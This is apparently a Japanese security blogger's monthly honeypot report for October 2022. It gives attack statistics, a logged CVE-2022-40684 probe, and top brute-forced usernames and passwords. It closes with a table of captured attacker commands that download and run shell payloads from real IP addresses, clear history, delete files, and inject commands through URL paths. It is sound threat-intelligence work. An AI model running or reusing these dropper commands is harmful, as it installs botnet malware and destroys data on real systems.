Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2022年10月)

今月のTopics

1.Fortinet製製品における認証バイパスの脆弱性

Fortinet製FortiOS、FortiProxyおよびFortiSwitchManagerの認証バイパスの脆弱性(CVE-2022-40684)に関する注意喚起 が報告された。

www.fortiguard.com www.jpcert.or.jp

PoCも多数公開されている。 認証回避の脆弱性を悪用して、指定したユーザーのSSH鍵を設定する。

出典: github.com

上記アクセスを確認すると調査用アクセスとして、数回のアクセスを観測した。PoCを使って動作検証をしており、501エラーで相手方へ戻っているようだ。 ※相手先ポートは80,81,9200が使われていた。

{
  "dest_ip": [
    "***.***.***.***"
  ],
  "dest_port": [
    9200
  ],
  "event_type": [
    "http"
  ],
  "geoip.city_name": [
    "London"
  ],
  "geoip.ip": [
    "212.71.255.156"
  ],
  "geoip.region_name": [
    "England"
  ],
  "geoip.timezone.keyword": [
    "Europe/London"
  ],
  "http.http_method": [
    "PUT"
  ],
  "http.http_port": [
    9200
  ],
  "http.http_user_agent": [
    "Report Runner"
  ],
  "http.protocol": [
    "HTTP/1.1"
  ],
  "http.status": [
    501
  ],
  "http.url": [
    "/api/v2/cmdb/system/admin/admin"
  ],
  "proto": [
    "TCP"
  ],
  "src_ip": [
    "212.71.255.156"
  ],
  "src_port": [
    33712
}

2.CodeBlue & AVTokyo参加

業務多忙の合間をぬってCodeBlue と AVTokyoに参加した。
・CodeBlueはC2サーバ関連の発表が特に印象的だった。C2情報をビットコインにのせる攻撃者の発想(ブロックチェーンに書き込まれた情報の削除は非常に困難)も凄いが、接続元IPを判定しないバグからシンクホールに追い込む発表者様の発想はもっと凄い。
・AVTokyoは初めてオフライン参加したが色々参考になった。知らない参加者の人にも積極的に声掛けできるようなコミュニケーション能力が必要だと痛感した。

AVTokyo2022 Day2@TK NIGHTCLUB - 渋谷

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2022年10月1日-2022年10月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Ddospot 1,282,416 375,696
2 Cowrie 1,047,739 213,126
3 Heralding 786,088 258,293
4 Honeytrap 567,423 276,038
5 Dionaea 272,534 6,190
6 Mailoney 19,240 ▲5,497
7 Adbhoney 18,015 3,838
8 Tanner 5,586 1,295
9 ConPot 2,761 494
10 Redishoneypot 2,661 566
11 Ciscoasa 2,140 1,001
12 ElasticPot 1,972 1,129
13 CitrixHoneypot 1,766 490
14 Ipphoney 215 82
15 Dicompot 100 ▲79
  • Result
    • Mailoney、Dicompotのアクセス件数が減少

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 Brazil 803,104 1(→)
2 Russia 721,330 2(→)
3 United States 466,798 3(→)
4 China 320,982 4(→)
5 Netherlands 266,773 5(→)
6 France 94,263 14(↑)
7 United Kingdom 90,636 13(↑)
8 India 76,370 11(↑)
9 Japan 73,027 6(↓)
10 Singapore 64,220 9(↓)
11 Vietnam 62,292 10(↓)
12 Sweden 61,955 15(↑)
13 Germany 54,237 7(↓)
14 South Korea 45,540 12(↓)
15 Indonesia 33,432 18(↑)
16 Panama 30,925 圏外(↑)
17 Costa Rica 29,318 圏外(↑)
18 Hong Kong 27,679 圏外(↑)
19 Mexico 27,555 17(↓)
20 Latvia 26,590 16(↓)
  • Result
    • Brazil(1位)~Netherlands(5位)までのアクセス順位に変動なし。
    • Costa Rica(17位)のアクセスを新規に観測した。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 387,526
2 CVE-2020-11910 41
3 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 6
4 CVE-1999-0016 1
  • Result
    • 特記事項なし

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 45,119
2 admin 7,579
3 nproc 3,331
4 user 3,046
5 postgres 2,472
6 test 2,350
7 (empty) 2,190
8 ubuntu 1,698
9 oracle 1,599
10 sa 1,554
11 22 1,283
12 support 983
13 steam 893
14 ftpuser 845
15 guest 823
16 testuser 661
17 !root 637
18 es 631
19 2Wire 629
20 git 617
21 mysql 521
22 www 495
23 pi 484
24 esuser 480
25 devops 457
26 hadoop 450
27 centos 404
28 ansible 387
29 vagrant 385
30 sh 376
31 dev 363
32 tester 363
33 666666 358
34 web 357
35 Admin 348
36 0 346
37 blank 346
38 ftp 339
39 cameras 333
40 minecraft 328
41 adm 327
42 unknown 325
43 $ALOC$ 321
44 ubnt 320
45 debug 318
46 halo 313
47 jenkins 312
48 student 300
49 deploy 280
50 tomcat 277
  • Result
    • 特記事項なし

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 123456 12,127
2 nproc 3,331
3 (empty) 3,045
4 123 2,751
5 admin 2,412
6 password 2,353
7 1234 1,640
8 12345 1,377
9 root 1,109
10 12345678 1,045
11 blank 960
12 1 810
13 0 766
14 user 765
15 test 758
16 ubnt 652
17 admin123 626
18 test123 620
19 support 552
20 00000000 507
21 666666 468
22 123456789 456
23 qwerty123 451
24 password123 444
25 alpine 394
26 111111 391
27 1qaz2wsx 374
28 test1234 373
29 abc123 372
30 master 372
31 1qaz@WSX 367
32 hi3518 361
33 Test1234 358
34 Aa123456 346
35 1234567890 338
36 Aa123456. 329
37 cameras 325
38 P@ssw0rd 323
39 backup 313
40 1q2w3e4r 308
41 10023 305
42 Test123 301
43 !ishtar 298
44 _Cisco 293
45 qwerty 288
46 unknown 285
47 synnet 284
48 1234567 282
49 123123 259
50 bzrx1098ui 249
  • Result
    • 全体的なアクセス件数は低下。
    • bzrx1098ui(50位)に新規パスワードを確認。脆弱なパスワードには含まれているが、どのような種類のパスワードかは不明

⑥今月のmasscanとZmap
  • masscanの観測結果は以下の通り。

  • Zmapの観測結果は以下の通り。

  • Result

    • 特記事項は無し。

最後に

  • AVTokyo2022のBadge、会社用に余分に購入したけど誰も欲しい人おらず。_| ̄|○il||li ガックシ・・il||li
  • 10月はCodeBlue + AVTokyoと他セキュリティイベントが目白押しのため、有意義だが非常にhard!!

◆shファイルに関するアクセス

No ファイル名 hash値(md5) アクセス
1 1sh - rm -rf /var/run/1sh; wget -c htt[p]://92.207.203.157/x/1sh -P /var/run && sh /var/run/1sh &,
2 2sh - rm -rf /tmp/2sh; wget -c htt[p]://92.207.203.157/x/2sh -P /tmp && sh /tmp/2sh &,
3 23.sh - #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget htt[p]://125.27.179.36/scripts/23s; curl -O htt[p]://125.27.179.36/scripts/23s; chmod +x 23s; ./23s; wget htt[p]://125.27.179.36/scripts/23; curl -O htt[p]://125.27.179.36/scripts/23; chmod +x 23; ./23; rm -rf 23.sh; history -c; ,
4 666.sh 86f1b914488183e170541692ffd31f8f cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://109.206.241.129/666.sh; curl -O htt[p]://109.206.241.129/666.sh; chmod 777 666.sh; sh 666.sh; tftp 109.206.241.129 -c get t666.sh; chmod 777 t666.sh; sh t666.sh; tftp -r t6662.sh -g 109.206.241.129; chmod 777 t6662.sh; sh t6662.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.129 6661.sh 6661.sh; sh 6661.sh; rm -rf 666.sh t666.sh t6662.sh 6661.sh; rm -rf *,
5 adbc.sh - cd /data/local/tmp/; wget htt[p]://135.148.104.21/adb.sh; busybox wget htt[p]://135.148.104.21/adb.sh; sh adb.sh; curl htt[p]://135.148.104.21/adbc.sh; sh adbc.sh
6 andbg - busybox wget htt[p]://31.220.3.140/andbg -O- | sh; busybox curl htt[p]://31.220.3.140/andbg | sh,
7 bcurl - >/data/local/tmp/.x && cd /data/local/tmp; >/sdcard/0/Downloads/.x && cd /sdcard/0/Downloads; >/storage/emulated/0/Downloads && cd /storage/emulated/0/Downloads; rm -rf wget bwget bcurl curl; wget htt[p]://45.61.184.119/wget; sh wget; busybox wget htt[p]://45.61.184.119/bwget; sh bwget; busybox curl htt[p]://45.61.184.119/bcurl > bcurl; sh bcurl; curl htt[p]://45.61.184.119/curl > curl; sh curl,
8 bw.sh 0dc8d5729a91b903101d063fbb3565ba cd /data/local/tmp/;rm -rf .sh; rm -rf .; wget htt[p]://185.156.73.178/bins/w.sh; busybox wget htt[p]://185.156.73.178/bins/bw.sh; sh bw.sh; curl -O htt[p]://185.156.73.178/bins/c.sh; sh c.sh; busybox curl -O htt[p]://185.156.73.178/bins/bc.sh; sh bc.sh,
9 c.sh - cd /data/local/tmp/; busybox wget htt[p]://bins.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/w.sh; sh w.sh; curl htt[p]://bins.chxv8ybuh2ytmfvfwrulcdqtywlooiybaevwsa2b.org/c.sh; sh c.sh,
10 doge.sh 0ba62dd2750c230a7e610fa2d9c99746 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://45.140.188.33/doge.sh; chmod 777 doge.sh; sh doge.sh; tftp 45.140.188.33 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.140.188.33; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.140.188.33 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf doge.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *,
11 hypnose.sh 91d188c8c1a3fd1a18ba12e52469b51b cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://5.253.246.70/hypnose.sh; curl -O htt[p]://5.253.246.70/hypnose.sh; chmod 777 hypnose.sh; sh hypnose.sh; tftp 5.253.246.70 -c get hypnose.sh; chmod 777 hypnose.sh; sh hypnose.sh; tftp -r hypnose2.sh -g 5.253.246.70; chmod 777 hypnose2.sh; sh hypnose2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.253.246.70 hypnose1.sh hypnose1.sh; sh hypnose1.sh; rm -rf hypnose.sh hypnose.sh hypnose2.sh hypnose1.sh; rm -rf *,
12 lol.sh 05d30b5bdeb2ddff9a8c5a24c00116f7 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://37.139.128.107/lol.sh; curl -O htt[p]://37.139.128.107/lol.sh; chmod 777 lol.sh; sh lol.sh; tftp 37.139.128.107 -c get lol.sh; chmod 777 lol.sh; sh lol.sh; tftp -r lol2.sh -g 37.139.128.107; chmod 777 lol2.sh; sh lol2.sh; ftpget -v -u anonymous -p anonymous -P 21 37.139.128.107 lol1.sh lol1.sh; sh lol1.sh; rm -rf lol.sh lol.sh lol2.sh lol1.sh; rm -rf *,
13 ohshit.sh 0726ad2ea637587586557a4a07a8f5c2 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://92.87.6.205/ohshit.sh; curl -O htt[p]://92.87.6.205/ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp 92.87.6.205 -c get ohshit.sh; chmod 777 ohshit.sh; sh ohshit.sh; tftp -r ohshit2.sh -g 92.87.6.205; chmod 777 ohshit2.sh; sh ohshit2.sh; ftpget -v -u anonymous -p anonymous -P 21 92.87.6.205 ohshit1.sh ohshit1.sh; sh ohshit1.sh; rm -rf ohshit.sh ohshit.sh ohshit2.sh ohshit1.sh; rm -rf *,
14 sensi.sh 6197d45d92ade6b1ae9b3609412939ac cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget htt[p]://185.117.3.120/sensi.sh; curl -O htt[p]://185.117.3.120/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 185.117.3.120 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 185.117.3.120; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.117.3.120 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf *,
15 shr - rm -rf shr; wget htt[p]://46.23.109.47/shr || curl -O htt[p]://46.23.109.47/shr || tftp 46.23.109.47 -c get shr || tftp -g -r shr 46.23.109.47; chmod 777 shr;./shr ssh; rm -rf shr,
16 sshc.sh 05c4e4aab0fd5ee629123a4d6a51e21e cd /tmp; wget htt[p]://179.43.175.5/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; curl htt[p]://179.43.175.5/sshc.sh -o sshc.sh; chmod 777 sshc.sh; sh sshc.sh; rm -rf *;,
17 test.sh cd3bc3e3adc45fd96640d27d1ebc9dbe cd /tmp; rm -rf test.sh; wget htt[p]://179.43.175.5/test.sh; curl htt[p]://179.43.175.5/test.sh -o test.sh; chmod 777 test.sh; ./test; sh test.sh,
18 tftp1.sh - cd /tmp || cd /var/run ||cd /mnt || cd /root || cd /; wget htt[p]://147.182.161.44/SnOoPy.sh; chmod 777 ; sh SnOoPy.sh; tftp -g 147.182.161.44 -r tftp1.sh; chmod 777 ; sh tftp1.sh; rm -rf *.sh; history -c,
19 w.sh - cd /data/local/tmp/; busybox wget htt[p]://107.182.129.219/w.sh; sh w.sh android.exploit; curl htt[p]://107.182.129.219/c.sh; sh c.sh android.exploit,
20 wget.sh 162ee53ef9df69eb808f72492d1390c0 cd /data/local/tmp/; busybox wget htt[p]://141.98.6.110/w.sh; sh w.sh; curl htt[p]://141.98.6.110/c.sh; sh c.sh; wget htt[p]://141.98.6.110/wget.sh; sh wget.sh; curl htt[p]://141.98.6.110/wget.sh; sh wget.sh; busybox wget htt[p]://141.98.6.110/wget.sh; sh wget.sh; busybox curl htt[p]://141.98.6.110/wget.sh; sh wget.sh,
21 wwww c08752a9c35abaf1ab3f61830fb92e4a cd /data/local/tmp; busybox wget htt[p]://5.206.227.228/wget -O -> wwww; sh wwww; curl -O htt[p]://5.206.227.228/curl; sh curl; rm wwww curl,
22 string.js d1a7cdaa1eda1b2bb1a2daeec1943da0 /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}htt[p]://175.107.13.18:55939/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js
23 wget.sh 078e9a9b315d76ae99d7449aa8182fee /cgi-bin/;cd+/tmp;wget+htt[p]:/45.95.55.214/a/wget.sh;chmod+777+wget.sh;sh+wget.sh+Netgear;rm+-rf+wget.sh



◆exeファイルに関するアクセス

  • 無し

今月の作業BGM
曲名 アーティスト 備考
You Can Call Me Al Paul Simon ---